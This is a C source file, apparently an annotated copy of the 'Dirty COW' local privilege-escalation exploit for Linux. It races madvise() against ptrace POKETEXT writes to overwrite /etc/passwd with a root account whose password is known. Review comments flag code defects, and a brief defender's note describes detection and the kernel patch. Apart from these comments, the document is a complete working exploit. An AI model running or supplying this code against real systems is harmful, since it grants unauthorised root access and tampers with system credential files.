#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <unistd.h>
/*
 * File-scope state shared by main() and madviseThread().
 * Everything here is assigned in main() before fork()/pthread_create();
 * after fork() each process holds its own copy, and `map` is only read
 * (by the child's thread and by the parent's ptrace loop), never rewritten.
 */
int f; // file descriptor returned by open(str, O_RDONLY) in main()
void *map; // private, read-only mmap() of the file; target of the parent's ptrace writes
pid_t pid; // fork() result: child's pid in the parent, 0 in the child
pthread_t pth; // handle of the madviseThread() started in the child
struct stat st; // fstat() result; only st_size is used (to size the mapping)
char *str = "/etc/passwd"; // path that is opened and mapped; never written through, so `const char *` would be correct
char *line = "root:As.Qw2p5l2zVE:0:0::/root:/bin/bash\n"; // replacement passwd entry poked into the mapping; likewise should be `const char *`
/*
The entry held in `line` has the following fields (shown here as a pseudo-struct):
struct User {
char *username = "root";
char *hash = "As.Qw2p5l2zVE"; // crypt() hash of the password "Password"
int user_id = 0;
int group_id = 0;
char *info = "";
char *home_dir = "/root";
char *shell = "/bin/bash";
};
*/
/*
 * Thread body run in the child: repeatedly discards the first 100 bytes of
 * the private mapping with madvise(MADV_DONTNEED), forcing the kernel to
 * re-fault them, apparently so that this races the parent's ptrace writes
 * into the same pages (see main()).  `arg` is unused.
 *
 * NOTE(review): declared to return void * but falls off the end without a
 * return statement.  pthread_join() in main() passes a NULL result pointer,
 * so nothing consumes the value, but `return NULL;` belongs at the end.
 * The iteration count 200000000 is a bare magic number.  `c` sums the
 * madvise() return values (0 on success, -1 on failure) purely for the
 * diagnostic printf.
 */
void *madviseThread(void *arg)
{
int i,c = 0;
for(i = 0; i < 200000000; i++)
c += madvise(map, 100, MADV_DONTNEED); // only the first 100 bytes of the mapping are advised, not the whole file
printf("madvise %d\n\n", c);
}
/*
 * Entry point.  Maps the file named by `str` privately and read-only, then
 * forks: the child starts madviseThread(), requests to be traced and stops
 * itself; the parent, once the child has stopped, uses PTRACE_POKETEXT to
 * write `line` into the child's view of the mapping, sizeof(long) bytes at
 * a time, at every byte offset of `line`, repeated many times.  This has the
 * shape of the "Dirty COW" copy-on-write race: presumably the intent is that
 * a write racing the child's madvise() lands in the underlying file rather
 * than in the private copy -- that depends entirely on a kernel defect and
 * does nothing on a fixed kernel (TODO confirm which kernel this targets).
 *
 * Defender's note: the observable behaviour is a child issuing a very large
 * number of madvise(MADV_DONTNEED) calls while its parent issues
 * PTRACE_POKETEXT against a private mapping of a file the user cannot write;
 * the artefact to look for is an unexpected modification of that file.  The
 * mitigation is a patched kernel.
 *
 * Returns 0 unconditionally; no system call below is checked.
 */
int main()
{
f = open(str, O_RDONLY); // unchecked: on failure -1 is passed on to fstat() and mmap()
fstat(f, &st); // unchecked; st.st_size sizes the mapping below
map=mmap(NULL, st.st_size+sizeof(long), PROT_READ, MAP_PRIVATE, f, 0); // unchecked (MAP_FAILED); the extra sizeof(long) presumably keeps the final POKETEXT word inside the mapping
printf("mmap %lx\n\n", (unsigned long)map);
pid=fork(); // unchecked: -1 would take the parent branch and waitpid() on an invalid pid
if(pid)
{
waitpid(pid, NULL, 0); // presumably returns when the traced child reports its SIGSTOP (see the else branch)
int u,i,o,c = 0; // only c is initialised here; u, i, o are set by the loops
int l = strlen(line); // size_t narrowed to int; harmless for this literal
for(i = 0; i < 10000/l; i++)
for(o = 0; o < l; o++)
for(u = 0; u < 10000; u++)
c += ptrace(PTRACE_POKETEXT, pid, map+o, *((long*)(line+o))); // NOTE(review): reads sizeof(long) bytes at line+o, so the last sizeof(long)-1 offsets read past the end of the literal (out-of-bounds read); the unaligned long read through a char * also breaks strict aliasing. map+o is void * arithmetic (GNU extension). c sums the 0/-1 results for the printf only.
printf("ptrace %d\n\n", c);
}
else
{
pthread_create(&pth, NULL, madviseThread, NULL); // unchecked
ptrace(PTRACE_TRACEME); // allow the parent to drive this process with ptrace
kill(getpid(), SIGSTOP); // stop so the parent's waitpid() returns. NOTE(review): kill()/SIGSTOP are declared in <signal.h>, which is not included here
pthread_join(pth, NULL); // the child lives until the madvise loop completes
}
return 0; // always 0; the fd and the mapping are only reclaimed at process exit
}